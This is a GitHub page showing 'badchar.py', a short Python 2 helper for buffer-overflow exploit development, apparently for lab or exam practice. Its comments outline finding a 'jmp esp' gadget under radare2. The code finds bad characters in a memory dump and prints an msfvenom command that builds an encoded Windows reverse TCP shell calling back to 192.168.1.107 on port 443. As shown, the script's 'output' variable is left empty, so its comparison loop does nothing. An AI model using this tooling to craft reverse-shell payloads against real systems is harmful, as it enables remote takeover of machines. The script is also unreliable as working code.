-
Notifications
You must be signed in to change notification settings - Fork 3
/
badchar.py
46 lines (38 loc) · 995 Bytes
/
badchar.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#usage
#1.trigger the bof with radare2 attached
#2.got the esp address by dr and s addr
#3.p8 @address > 1.txt
#4.copy to output varaible until closest string to 0xff or upto 0xff
#5 find gadget /R jmp esp
#get pattern
fs=open("pattc10000")
pattern = fs.read()[:-1]
input_=[]
output=""
for i in range(1,0xff+1):
input_.append(i)
pad=""
for i in range(1,0xff+1):
pad+=chr(i)
become=[]
badchar=[chr(0)]
for i in range(0,len(output),2):
try:
if int("0x"+output[i:i+2],16)!=input_[i/2]:
badchar.append(chr(input_[i/2]))
if chr(int("0x"+output[i:i+2],16)) not in become:
become.append(chr(int("0x"+output[i:i+2],16)))
except:
pass
print badchar
print become
#gen command for msf
cmd= "msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.107 LPORT=443 -f c –e x86/shikata_ga_nai -b \""
for q in badchar:
cmd+=q
for q in become:
cmd+=q
cmd+=" -f python"
print cmd